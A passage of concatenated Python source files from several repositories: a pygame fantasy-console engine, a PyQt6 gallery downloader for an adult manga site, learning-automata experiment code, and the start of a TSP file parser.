import os
_stdout = sys.stdout
sys.stdout = open(os.devnull,'w')
import pygame.freetype
sys.stdout = _stdout
del(_stdout)
del(sys)
del(os)
from editor_utils.local_vars import (
default_font
)
class font(object):
def __init__(self,font:str=None) -> None:
self.font = font if font is not None else default_font
def load(self):# returns a font
return pygame.freetype.Font(self.font)
```
#### File: hagia/hagia/soundSYS.py
```python
import sys
_stdout = sys.stdout
sys.stdout = None
from pygame import (
mixer
)
from pygame.locals import *
sys.stdout = _stdout
del _stdout
del sys
from .errata import (
BASE_HAGIA_ERROR,
HAGIA_ASSERT
)
from os import path
from .utils import Thread
from .defs import HAGIA_SPECS
class SoundSystem(object):
def __init__(self):
pass
def init_sound(self):
try:
mixer.pre_init(
frequency=44100,
size=-16,
channels=2,
buffer=512,
devicename=None,
allowedchanges=AUDIO_ALLOW_FREQUENCY_CHANGE | AUDIO_ALLOW_CHANNELS_CHANGE
)
mixer.init()
except:
raise BASE_HAGIA_ERROR("hagia.sound.SoundSystem failed to initialize")
self.snd:list = []
self.mus:list = []
self.channels:list = []
for chnl in range(HAGIA_SPECS.SOUND_CHANNELS):
self.channels.append(
mixer.Channel(chnl)
)
#self.channels[chnl].__currently_playing = -1
async def load_sound_data(self):
self.snd:list = []
self.mus:list = []
def ok_list_of_strs(_dataset:list) -> bool:
for sndx in _dataset:
if not isinstance(sndx, str): # "not sndx is str" only compared identity with the type object
return False
return True
def check_list_snd_mus(_attr:str,*args):
if (
isinstance(getattr(self.cart,_attr), list) and
len(getattr(self.cart,_attr)) > 0
):
HAGIA_ASSERT(
ok_list_of_strs(getattr(self.cart,_attr)),
"Error: Must be a list of strings for SFX and MUSIC."
)
sfx_check = Thread(
target=check_list_snd_mus,
args=("sfx",)
)
mus_check = Thread(
target=check_list_snd_mus,
args=("music",) # comma otherwise breaks and
# pretends the string is a list
# :)
)
sfx_check.start()
mus_check.start()
#for sndx,musx in zip(self.cart.sfx,self.cart.music):
# self.snd.append(
# mixer.Sound(path.join(self.cart.c_data_directory,sndx))
# )
# self.mus.append(
# path.join(self.cart.c_data_directory,musx)
# )
for sndx in self.cart.sfx:
self.snd.append(
mixer.Sound(path.join(self.cart.c_data_directory,sndx))
)
for musx in self.cart.music:
self.mus.append(
path.join(self.cart.c_data_directory,musx)
)
sfx_check.join()
mus_check.join()
del sfx_check
del mus_check
def sfx(
self,
n:int,
channel:int=-1,
fade_len:int=0
) -> None:
# default) to automatically choose a channel that is not being used
if channel < 0:
for c in self.channels:
if n==-1:c.stop();continue
elif n==-2:c.fadeout(fade_len);continue
if channel==-1 and not c.get_busy():
c.play(self.snd[n],fade_ms=fade_len)
return
elif channel==-2 and c.get_sound() == self.snd[n]:
c.stop()
return
return
if n == -1:
self.channels[channel].stop()
return
elif n==-2:
self.channels[channel].fadeout(fade_len)
return
# normal
self.channels[channel].play(self.snd[n],fade_ms=fade_len)
def music(
self,
n:int,
fade_len:int=0,
#channel_mask:int=-1,
loop:int=-1,
offset:float=0.0
) -> None:
if n==-1:
mixer.music.stop()
mixer.music.unload()
return
if not mixer.music.get_busy():
mixer.music.stop()
mixer.music.unload()
mixer.music.load(self.mus[n])
mixer.music.play(loops=loop,start=offset,fade_ms=fade_len)
```
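The sentinel values in `sfx` (`n=-1` stop, `n=-2` fade out, `channel=-1` auto-pick a free channel) follow a PICO-8-style convention; hypothetical calls against a running `System` instance, with semantics read off the branches above:
```python
def demo(sys8):  # sys8: a booted hagia System (construction elided)
    sys8.sfx(3)                 # play sound 3 on the first free channel
    sys8.sfx(3, channel=2)      # force it onto channel 2
    sys8.sfx(-1, channel=2)     # stop whatever channel 2 is playing
    sys8.sfx(-2, fade_len=500)  # fade every channel out over 500 ms
    sys8.music(0, loop=-1)      # loop track 0; music(-1) stops and unloads
```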
#### File: hagia/hagia/system.py
```python
import sys
_stdout = sys.stdout
sys.stdout = None
from pygame import init, event, quit, time
sys.stdout = _stdout
del _stdout
from .graphicSYS import GraphicSystem
from .soundSYS import SoundSystem
from .inputSYS import InputSystem
from .mapSYS import MapSystem
from .flagSYS import FlagSystem
from .utils import *
from .defs import HAGIA_SPECS
from typing import NoReturn
import asyncio
class System(
GraphicSystem, SoundSystem, InputSystem,
FlagSystem,MapSystem
):
def __init__(self):
pass
# booting up the system with the cart
def __init_system__(self,_cartridge) -> None:
self._cart = _cartridge
self.cart = self._cart()
init()
self.init_flags()
self.init_map()
self.init_graphics()
self.init_sound()
self.init_input()
# init time stuff
self.init_time()
self.init_camera()
asyncio.run(self.load_cart_data())
async def load_cart_data(self) -> None:
# all of these functions will assume a self.cart exists in them
# despite them not existing in the class whatsoever
# which may cause confusion for maintenance, but whatever
t2 = asyncio.create_task(self.load_sound_data())
t3 = asyncio.create_task(self.load_map_data())
t4 = asyncio.create_task(self.load_flag_data())
t1 = asyncio.create_task(self.load_graphics_data())
await t1
await t2
await t3
await t4
# PRINT SIZES OF DATA
#self.DEBUG_DATASET_SIZES()
del t1
del t2
del t3
del t4
def DEBUG_DATASET_SIZES(self):
print("----------------------------------------\n")
print(f"Gfx size : {sys.getsizeof(self.atlas) / 1000} mB")
print(f"Map size : {sys.getsizeof(self._map)/ 1000} mB")
print(f"Sfx size : {sys.getsizeof(self.snd) / 1000} mB")
print(f"Mus size : {sys.getsizeof(self.mus) / 1000} mB")
print(f"Cart size : {sys.getsizeof(self.cart) / 1000} mB")
print("\n----------------------------------------\n")
def main_loop(self) -> None:
self.cart.init()
self._main_loop:bool = True
while self._main_loop:
self.pump()
self.reg_evs()
self.cart.update()
self.cart.draw()
self.render()
#self.cls(0)
self.check_evs()
self.tick()
# recurse to restart the loop after RESET clears _main_loop; SHUTDOWN exits the process instead
self.main_loop()
def reg_evs(self) -> None:
self.evs = [ev.type for ev in event.get()]
self.reg_kevs()
event.clear()
def check_evs(self) -> None:
# if WINDOW_X_BUTTON button was pressed
# or if HAGIA_CONTROLS.EXIT button was pressed
if (
0x100 in self.evs or
self.btn(8)
):
self.SHUTDOWN()
if (
self.btn(6)
):
self.RESET()
if (
self.btn(7)
):
self.PAUSE()
def pump(self) -> None:
event.pump()
def init_time(self) -> None:
self.fr = HAGIA_SPECS.FRAMERATE
self.clock = time.Clock()
def tick(self) -> None:
self.clock.tick(self.fr)
# delta-time
def dt(self) -> float:
return self.clock.get_time() / 1000
def init_camera(self) -> None:
self._camera = Vec2i(0,0)
def camera(self,x:int=0,y:int=0) -> None:
self._camera.set_to( flr(-x), flr( -y) )
def PAUSE(self) -> None:
pass
def RESET(self) -> None:
self.cart = self._cart()
asyncio.run(self.load_cart_data())
self._main_loop:bool = False
def SHUTDOWN(self) -> NoReturn:
quit()
sys.exit("Shutting down Hagia...")
```
#### File: hagia/utils/hstrings.py
```python
def sub(
_str:str,
_from:int,
_to:int=None
) -> str:
_to = _from + 1 if _to is None else _to
return _str[_from:_to]
def tostr(
val,
_hex:bool=False
) -> str:
return str(val) if not _hex else str(hex(val))
def tonum(
_str:str
) -> float or int:
try:
return int(_str)
except ValueError:
return float(_str)
``` |
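A few worked calls covering the three helpers (import path taken from the file header, assuming the package is importable):
```python
from hagia.utils.hstrings import sub, tostr, tonum

assert sub("hello", 1, 3) == "el"  # plain _str[_from:_to] slicing
assert sub("hello", 1) == "e"      # _to defaults to _from + 1
assert tostr(255, _hex=True) == "0xff"
assert tonum("3") == 3 and tonum("3.5") == 3.5
```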
{
"source": "0xSTAR/NH-DL",
"score": 2
} |
#### File: NH-DL/src/base_ui.py
```python
from PyQt6 import QtCore, QtGui, QtWidgets
from lang_db import (
SELECTED_LANG,
LANGS,
LANG_DB
)
#from copy import deepcopy
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.setEnabled(True)
Form.resize(440, 679)
### UNIVERSAL APP FONT ###
QtGui.QFontDatabase.addApplicationFont("content/FiraCode-Bold.ttf")
UNIVERSAL_FONT = QtGui.QFont("Fira Code")
##########################
self.sauceBox = QtWidgets.QLineEdit(Form)
self.sauceBox.setGeometry(QtCore.QRect(40, 239, 251, 41))
font = UNIVERSAL_FONT#QtGui.QFont()
font.setPointSize(20)
self.sauceBox.setFont(font)
self.sauceBox.setStyleSheet("background: rgba(255, 255, 255,195);")
self.sauceBox.setMaxLength(6)
self.sauceBox.setFrame(True)
self.sauceBox.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.sauceBox.setObjectName("sauceBox")
self.saveDirectory = QtWidgets.QLineEdit(Form)
self.saveDirectory.setGeometry(QtCore.QRect(40, 350, 351, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(20)
self.saveDirectory.setFont(font)
self.saveDirectory.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor))
self.saveDirectory.setStyleSheet("background: rgba(255, 255, 255,195);")
self.saveDirectory.setInputMask("")
self.saveDirectory.setText("")
self.saveDirectory.setFrame(True)
self.saveDirectory.setEchoMode(QtWidgets.QLineEdit.EchoMode.Normal)
self.saveDirectory.setCursorPosition(0)
self.saveDirectory.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.saveDirectory.setReadOnly(True)
self.saveDirectory.setObjectName("saveDirectory")
self.labelSauce = QtWidgets.QLabel(Form)
self.labelSauce.setGeometry(QtCore.QRect(40, 190, 200, 35))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.labelSauce.setFont(font)
self.labelSauce.setAutoFillBackground(False)
self.labelSauce.setStyleSheet("color: rgb(255, 255, 255);")
self.labelSauce.setLineWidth(0)
self.labelSauce.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.labelSauce.setObjectName("labelSauce")
self.saveDirLabel = QtWidgets.QLabel(Form)
self.saveDirLabel.setGeometry(QtCore.QRect(40, 310, 200, 35))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setItalic(False)
font.setUnderline(False)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.saveDirLabel.setFont(font)
self.saveDirLabel.setAutoFillBackground(False)
self.saveDirLabel.setStyleSheet("color: rgb(255, 255, 255);")
self.saveDirLabel.setLineWidth(0)
self.saveDirLabel.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.saveDirLabel.setObjectName("saveDirLabel")
self.downloadFrame = QtWidgets.QFrame(Form)
self.downloadFrame.setGeometry(QtCore.QRect(310, 240, 81, 41))
self.downloadFrame.setStyleSheet("border-width: 10px;\n"
"border-radius: 50px; \n"
"")
self.downloadFrame.setFrameShape(QtWidgets.QFrame.Shape.StyledPanel)
self.downloadFrame.setFrameShadow(QtWidgets.QFrame.Shadow.Raised)
self.downloadFrame.setObjectName("downloadFrame")
self.exitButton_2 = QtWidgets.QPushButton(self.downloadFrame)
self.exitButton_2.setGeometry(QtCore.QRect(0, 0, 81, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
#font.setFamily("Sans Serif")
font.setPointSize(25)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.exitButton_2.setFont(font)
self.exitButton_2.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.OpenHandCursor))
self.exitButton_2.setStyleSheet("background: rgb(236,40,84); \n"
"color: rgb(255,255,255);")
self.exitButton_2.setObjectName("exitButton_2")
self.changeDirectoryFrame = QtWidgets.QFrame(Form)
self.changeDirectoryFrame.setGeometry(QtCore.QRect(40, 400, 351, 41))
self.changeDirectoryFrame.setStyleSheet("border-width: 10px;\n"
"border-radius: 50px; \n"
"")
self.changeDirectoryFrame.setFrameShape(QtWidgets.QFrame.Shape.StyledPanel)
self.changeDirectoryFrame.setFrameShadow(QtWidgets.QFrame.Shadow.Raised)
self.changeDirectoryFrame.setObjectName("changeDirectoryFrame")
self.changeDirectory = QtWidgets.QPushButton(self.changeDirectoryFrame)
self.changeDirectory.setGeometry(QtCore.QRect(0, 0, 351, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
#font.setFamily("Sans Serif")
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.changeDirectory.setFont(font)
self.changeDirectory.setCursor(QtGui.QCursor(QtCore.Qt.CursorShape.OpenHandCursor))
self.changeDirectory.setStyleSheet("background: rgb(236,40,84); \n"
"color: rgb(255,255,255);")
self.changeDirectory.setObjectName("changeDirectory")
self.progressionBar = QtWidgets.QProgressBar(Form)
self.progressionBar.setGeometry(QtCore.QRect(40, 510, 351, 81))
self.progressionBar.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight)
self.progressionBar.setStyleSheet("QProgressBar::chunk {\n"
" background-color: rgb(236,40,84); \n"
" color:rgba(220,220,210,190)\n"
"};\n"
"")
self.progressionBar.setProperty("value", 0)
self.progressionBar.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)
self.progressionBar.setOrientation(QtCore.Qt.Orientation.Vertical)
self.progressionBar.setInvertedAppearance(False)
self.progressionBar.setTextDirection(QtWidgets.QProgressBar.Direction.TopToBottom)
self.progressionBar.setObjectName("progressionBar")
self.labelStatus = QtWidgets.QLabel(Form)
self.labelStatus.setGeometry(QtCore.QRect(40, 460, 270, 41))
font = UNIVERSAL_FONT#deepcopy(UNIVERSAL_FONT)#QtGui.QFont()
font.setPointSize(15)
font.setBold(True)
font.setWeight(75)
font.setStyleStrategy(QtGui.QFont.StyleStrategy.PreferAntialias)
self.labelStatus.setFont(font)
self.labelStatus.setStyleSheet("color: rgb(255, 255, 255);")
self.labelStatus.setTextFormat(QtCore.Qt.TextFormat.AutoText)
self.labelStatus.setAlignment(QtCore.Qt.AlignmentFlag.AlignBottom|QtCore.Qt.AlignmentFlag.AlignLeading|QtCore.Qt.AlignmentFlag.AlignLeft)
self.labelStatus.setObjectName("labelStatus")
self.BG = QtWidgets.QLabel(Form)
self.BG.setGeometry(QtCore.QRect(0, 0, 440, 679))
self.BG.setText("")
self.BG.setPixmap(QtGui.QPixmap("content/bg0.png"))
self.BG.setScaledContents(False)
self.BG.setObjectName("BG")
self.LOGO = QtWidgets.QLabel(Form)
self.LOGO.setGeometry(QtCore.QRect(40, 20, 364, 160))
self.LOGO.setText("")
self.LOGO.setPixmap(QtGui.QPixmap("content/nh0.png"))
self.LOGO.setObjectName("LOGO")
self.BG.raise_()
self.sauceBox.raise_()
self.saveDirectory.raise_()
self.labelSauce.raise_()
self.saveDirLabel.raise_()
self.downloadFrame.raise_()
self.changeDirectoryFrame.raise_()
self.progressionBar.raise_()
self.labelStatus.raise_()
self.LOGO.raise_()
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "NH"))
self.sauceBox.setPlaceholderText(_translate("Form", "177013"))
self.saveDirectory.setPlaceholderText(_translate("Form", "Select a Directory"))
self.labelSauce.setText(_translate("Form", LANG_DB[SELECTED_LANG][0]))
self.saveDirLabel.setText(_translate("Form", LANG_DB[SELECTED_LANG][1]))
self.exitButton_2.setText(_translate("Form", LANG_DB[SELECTED_LANG][7]))
self.changeDirectory.setText(_translate("Form", LANG_DB[SELECTED_LANG][2]))
self.labelStatus.setText(_translate("Form", LANG_DB[SELECTED_LANG][6]))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec())
```
#### File: NH-DL/src/nhentai.py
```python
import os
import math
import httpx
import asyncio
import threading
from bs4 import BeautifulSoup
from dataclasses import dataclass
from enum import (
Enum,
unique,
auto
)
from lang_db import (
SELECTED_LANG,
LANGS,
LANG_DB
)
from PyQt6.QtCore import QThread, pyqtSignal
@unique
class NH_ENUMS(Enum):
BASE_LNK = "https://nhentai.net/g/"
SUPER_BASED_LNK = "https://nhentai.net"
NH_API = "https://nhentai.net/api/gallery/"
IMG_URL = "https://i.nhentai.net/galleries/"
CONFIG = "nh.ini"
class Client(httpx.AsyncClient):
def __init__(self,*args,**kwargs):
super().__init__(*args,**kwargs)
#self.headers.update(
# {
# "User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0",
# "Connection":"Keep-Alive"
# }
#)
@staticmethod
def create_client() -> object:
headers = {"user-agent":"Mozilla/5.0 (X11; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0"}
client = Client(
headers=headers
)
return client
class Thread(threading.Thread):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __start(self):
self.start()
def __join(self):
self.join()
@dataclass
class Progress:
percent:float=0.0
increment:float=0.0
text:str="Idling..."
@dataclass(frozen=True)
class valid_page:
lnk:str
filename:str
async def sift(_client: Client, PROG_BAR: Progress, code: str) -> valid_page:
"""BASE_NHENTAI_LINK = NH_ENUMS.BASE_LNK.value
SUPER_BASED_NHENTAI_LINK = NH_ENUMS.SUPER_BASED_LNK.value"""
PROG_BAR.text = LANG_DB[SELECTED_LANG][3]
api_lnk: str = NH_ENUMS.NH_API.value
img_lnk: str = NH_ENUMS.IMG_URL.value
#_client = Client.create_client()
# api scraper
r0 = await _client.get(api_lnk + code)
j0 = r0.json()
EXTEND = {
"j":".JPG",
"p":".PNG",
"g":".GIF"
} # LOL, IT SPELLS OUT JPG
dj_pages = j0["images"]["pages"]
try:
PROG_BAR.increment = 100 / len(dj_pages)
except ZeroDivisionError:
PROG_BAR.increment = 100
PROG_BAR.text = LANG_DB[SELECTED_LANG][8] + " 404"
TRUE_ID = str(int(j0["media_id"]))
for no, p in enumerate(dj_pages,start=1):
fn: str = "{}{}".format(str(no), EXTEND[p["t"]].lower() )
yield valid_page(
"{}{}/{}".format(img_lnk,TRUE_ID,fn),
fn
)
#await _client.aclose()
# bye bye frontend scraper !
async def download(client: Client, link:str, file_dest:str, _folder) -> None:
#print(_folder+file_dest)
with open(_folder+file_dest,'wb') as dest:
async with client.stream("GET", link) as stream_obj:
async for chnk in stream_obj.aiter_bytes(chunk_size=4096):
dest.write(chnk)
class NHentai(QThread):
progress_plus_txt_Signal = pyqtSignal(float, str)
def __init__(self, code:str, savedir:str):
super().__init__()
self.__code:str = str(code)
self.__folder = "{}/{}/".format(
str(savedir), self.__code
)
self.progressBar = Progress()
self.client = Client.create_client()
def ptEmit(self) -> None:
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
def detectCloudFlare(self) -> None:
self.progressBar.text = "CHECKING FOR CLOUDFLARE..."
self.ptEmit()
test = httpx.get(
NH_ENUMS.NH_API.value + self.__code
).headers
try:
if test["server"] == "cloudflare":
self.progressBar.text = "CLOUDFLARE DETECTED"
self.ptEmit()
#await self.client.aclose()
#asyncio.run(self.client.aclose())
#return
else:
self.progressBar.text = "NO CLOUDFLARE DETECTED"
except KeyError:  # no "server" header present
pass
self.ptEmit()
def run(self) -> None:
try:
os.mkdir(path=str(self.__folder), mode=511, dir_fd=None)
except FileExistsError:
pass
#os.chdir(self.__folder)
### TEST FOR CLOUDFLARE
#self.detectCloudFlare()
###
self.progressBar.text = LANG_DB[SELECTED_LANG][3]
self.ptEmit()
asyncio.run(self.run_async())
async def run_async(self):
async for lnk in sift(self.client, self.progressBar, self.__code):
self.progressBar.text = LANG_DB[SELECTED_LANG][4]
x = await download(self.client, lnk.lnk, lnk.filename, self.__folder)
self.progressBar.percent += self.progressBar.increment
self.progressBar.percent = min(self.progressBar.percent, 100)
#self.progressBar.percent = math.floor(self.progressBar.percent)
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
self.progressBar.text = LANG_DB[SELECTED_LANG][5]
self.progressBar.percent = 100
self.progress_plus_txt_Signal.emit(
self.progressBar.percent,
self.progressBar.text
)
await self.client.aclose()
``` |
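A minimal wiring sketch for the `NHentai` worker above, assuming the widget names (`progressionBar`, `labelStatus`) from the generated UI file; `start_download` is a hypothetical helper, not part of the source.
```python
# Hypothetical helper: connects the NHentai worker's progress signal to the
# progress bar and status label from the generated UI above.
def start_download(ui, code: str, savedir: str) -> NHentai:
    worker = NHentai(code, savedir)

    def on_progress(percent: float, text: str) -> None:
        ui.progressionBar.setValue(int(percent))  # QProgressBar expects ints
        ui.labelStatus.setText(text)

    worker.progress_plus_txt_Signal.connect(on_progress)
    worker.start()  # QThread.start() runs NHentai.run() on a worker thread
    return worker   # keep a reference so the thread is not garbage-collected
```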
{
"source": "0xSteve/detection_learning",
"score": 3
} |
#### File: detection_learning/distest/senvironment.py
```python
import numpy as np
# from random import uniform as u
class SEnvironment(object):
'''The S-model Learning Environment.'''
def __init__(self, p_vector, precision=1):
'''Create a probability vector from the probability of
success vector.'''
self.p = np.array(p_vector)
self.precision = precision
# Only the environment knows the best xmission a priori.
# best xmission is used to evaluate a posteriori learning.
self.best_xmission = max(self.p)
def response(self, depth_index):
'''Respond to the mobile agent with the value of the timeout
probability.'''
# return self.p[depth_index] > u(0, 1)
return self.p[(depth_index - 1) * self.precision]
```
#### File: learning model implementation/one_sensor_nonstationary_lrp/mse.py
```python
import numpy as np
class MSE(object):
'''Change the learning environment in accordance with a Markovian
Switching Environment model.'''
def __init__(self, environments, time_between=0):
'''Define the number of environments and their order by passing
the environments value. Optionally, choose the time between
changing environments with the time_between variable. If the
default value is used, then environment switching is assumed to be
manual.'''
self.envs = np.array(environments)
self.time_between = time_between
# The first environment is always the 0th index in the environments.
self.cur_env = 0 # This is the current environment being used.
def set_environments(self, environments):
'''Set the environments that are in the MSE.'''
self.envs = np.array(environments)
def get_environments(self):
'''Return the list of environments in the MSE.'''
return self.envs
def next_env(self):
'''Switch to the next environment in the MSE.'''
self.cur_env = (self.cur_env + 1) % len(self.envs)
return self.envs[self.cur_env]
def env_now(self):
'''Get the current environment.'''
return self.envs[self.cur_env]
```
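A short usage sketch for `MSE`, assuming the `SEnvironment` class from the distest module above is importable here; the probability vectors are made-up illustrative values.
```python
# Illustrative only: two hand-picked timeout-probability vectors.
env_a = SEnvironment([0.2, 0.8, 0.5])
env_b = SEnvironment([0.9, 0.1, 0.4])
mse = MSE([env_a, env_b])

print(mse.env_now().response(1))  # 0.2 -- queries env_a at depth index 1
mse.next_env()                    # switch to env_b
print(mse.env_now().response(1))  # 0.9
mse.next_env()                    # wraps around back to env_a
```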
#### File: learning model implementation/one_sensor_stationary_dlri/discretized_lri.py
```python
from random import uniform
import helpers as h
import numpy as np
class DLRI(object):
def __init__(self, num_actions):
self.p = np.array(h.make_dp(num_actions))
self.best = 2 * num_actions # Best time-cost.
def next_action(self):
randy = uniform(0, 1) # Throwback to Archer.
index = 0 # Worst case select the first action.
# print("The p is: " + str(self.p))
probs = self.p / sum(self.p)
cdf = h.cdf(probs)
# print("The cdf is: " + str(cdf))
index = h.get_index(randy, cdf)
return index
def do_reward(self, action):
self.p[action] += np.count_nonzero(self.p)
self.p = h.subtract_nonzero(self.p, 1)
def do_penalty(self):
pass
```
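A hedged sketch of the reward-inaction loop around `DLRI`; the `helpers` module (`h.make_dp`, `h.cdf`, `h.get_index`) is not shown, so this assumes it behaves as the names suggest, and `env` is a stand-in with a `response(action) -> bool` method where `True` means penalty.
```python
# Sketch of the L_RI interaction loop; `env` is a stand-in environment.
def train(env, num_actions: int, steps: int = 1000) -> DLRI:
    la = DLRI(num_actions)
    for _ in range(steps):
        action = la.next_action()
        penalized = env.response(action)
        if not penalized:
            la.do_reward(action)  # reinforce the rewarded action
        else:
            la.do_penalty()       # reward-inaction: ignore penalties
    return la
```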
#### File: learning model implementation/one_sensor_stationary_lri/environment.py
```python
import helpers as h
import numpy as np
class Environment(object):
'''The Environment in which learning occurs.'''
def __init__(self, num_actions):
self.c = np.array(h.make_p(num_actions))
self.best = 10 * num_actions # Always worse than the worst time.
def response(self, m, request):
is_reward = self.reward_function(m, request)
if(not is_reward):
self.c += 1
self.c[m] -= 1
self.c = self.c / sum(self.c)
return is_reward
def reward_function(self, m, req):
'''The reward function is the heart and soul of this problem.'''
# The reward function needs to be good, otherwise learning does
# not happen.
if(m == req):
return 0
return 1
```
#### File: detection_learning/S_Model/experiment.py
```python
from agent import Agent
from senvironment import SEnvironment
import numpy as np
class Experiment(object):
def __init__(self, depth, channel_depth, p_vector, precision=1,
isNS=False):
self.agent = Agent(precision, depth, channel_depth)
self.max = 10000
self.start = 0
if(not isNS):
self.environment = SEnvironment(p_vector)
self.dist_est = np.zeros(int(len(p_vector) / precision))
self.learned_best = np.zeros(int(len(p_vector) / precision))
self.action1_p = np.zeros(self.max - self.start)
self.action0_p = np.zeros(self.max - self.start)
self.action2_p = np.zeros(self.max - self.start)
else:
self.environment = [SEnvironment(p_vector[0]),
SEnvironment(p_vector[1])]
self.dist_est = np.zeros(int(len(p_vector[0]) / precision))
self.learned_best = np.zeros(int(len(p_vector[0]) / precision))
self.action1_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
self.action0_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
self.action2_p = [np.zeros(self.max - self.start), np.zeros(self.max - self.start)]
# The learned best depth is the index. Stored in the index is the
# confidence that the index is the best.
# I need a metric to track the rate of entering the do-
# nothing state. To achieve this, I will append the probability of
# choosing this action as I approach the end of the ensemble. In this
# way we can see that the ergodic LA will tend towards this action as
# it encounters the maximum.
def evaluate(self):
self.agent.move()
self.agent.receive(self.environment.response(self.agent.send()))
self.agent.next_action()
def evaluate_ns(self, env_index):
self.agent.move()
self.agent.receive(
self.environment[env_index].response(
self.agent.send()))
self.agent.next_action()
def ensemble_evaluation(self, number_iterations):
for i in range(number_iterations):
count = 0
data_counter = 0
self.agent.lrp.reset_actions()
# print(self.agent.depth)
while(count < self.max): # and count < 1000000
if(count >= self.start):
# print("count is: " + str(count) +
# ", p = " + str(self.agent.lrp.p))
# time.sleep(1)
self.action1_p[data_counter] += self.agent.lrp.p[1]
self.action0_p[data_counter] += self.agent.lrp.p[0]
self.action2_p[data_counter] += self.agent.lrp.p[2]
self.dist_est[self.agent.depth - 1] += 1
data_counter += 1
self.evaluate()
count += 1
# if(max(self.agent.lrp.p) > 0.90):
if(max(self.agent.lrp.p) > 0.98 and
count == self.max - 1):
# print("BOOOM DONE!!")
# print("************************************")
self.learned_best[self.agent.depth - 1] += 1
# break
# self.action1_p = self.action1_p / (count - self.start)
self.learned_best = self.learned_best / number_iterations
self.dist_est = self.dist_est
self.action1_p = self.action1_p / number_iterations
self.action0_p = self.action0_p / number_iterations
self.action2_p = self.action2_p / number_iterations
def ensemble_evaluation_ns(self, number_iterations):
for k in range(len(self.environment)):
for i in range(number_iterations):
count = 0
data_counter = 0
self.agent.lrp.reset_actions()
# print(self.agent.depth)
while(count < self.max): # and count < 1000000
if(count >= self.start):
# print("count is: " + str(count) +
# ", p = " + str(self.agent.lrp.p))
# time.sleep(1)
self.action1_p[k][data_counter] += self.agent.lrp.p[1]
self.action0_p[k][data_counter] += self.agent.lrp.p[0]
self.action2_p[k][data_counter] += self.agent.lrp.p[2]
self.dist_est[self.agent.depth - 1] += 1
data_counter += 1
self.evaluate_ns(k)
count += 1
# if(max(self.agent.lrp.p) > 0.90):
if(max(self.agent.lrp.p) > 0.98 and
count == self.max - 1):
# print("BOOOM DONE!!")
# print("************************************")
self.learned_best[self.agent.depth - 1] += 1
# break
# self.action1_p = self.action1_p / (count - self.start)
self.learned_best = self.learned_best / number_iterations
self.dist_est = self.dist_est
self.action1_p[k] = self.action1_p[k] / (number_iterations)
self.action0_p[k] = self.action0_p[k] / (number_iterations)
self.action2_p[k] = self.action2_p[k] / (number_iterations)
``` |
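A hedged driver sketch for the stationary S-model `Experiment`; the depth, channel depth and probability vector below are placeholder values, and the `Agent` internals are assumed from their use in `evaluate()`.
```python
# Placeholder parameters for illustration only.
p_vector = [0.1, 0.3, 0.9, 0.5]  # timeout probability per depth
exp = Experiment(depth=2, channel_depth=4, p_vector=p_vector)
exp.ensemble_evaluation(number_iterations=10)

print(exp.learned_best)   # per-depth confidence of being the best depth
print(exp.action1_p[:5])  # early-step probability of choosing action 1
```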
{
"source": "0xSteve/tsp_ga",
"score": 3
} |
#### File: 0xSteve/tsp_ga/parser.py
```python
__author__ = "<NAME>"
__version__ = "0.0.1"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
class Parser(object):
'''A parser class for .tsp files.'''
def __init__(self, filename):
'''create an instance of the parser with a file to read.'''
self.city_coords = {}
self.city_tour_init = []
self.city_tour_tuples = []
self.filename = filename
self.display_status = ''
# Discard the file after parsing...
content = self.read_filename(filename)
self.dimension = self.get_dimension(content)
self.edge_weight_type = self.get_edge_weight_type(content)
self.city_coords = self.get_city_coord(content)
self.city_tour_init = self.create_initial_tour()
self.city_tour_tuples = self.create_initial_coord_tuples()
def read_filename(self, filename):
'''Line-by-line read of the .tsp file.'''
with open(self.filename) as f:
self.content = f.read().splitlines()
self.display_status = 'file_loaded'
return self.content
def get_dimension(self, content):
'''Find the DIMENSION line and get the dimension.'''
for l in self.content:
if l.startswith("DIMENSION"):
index, space, rest = l.partition(':')
return rest.strip()
def get_edge_weight_type(self, content):
"""
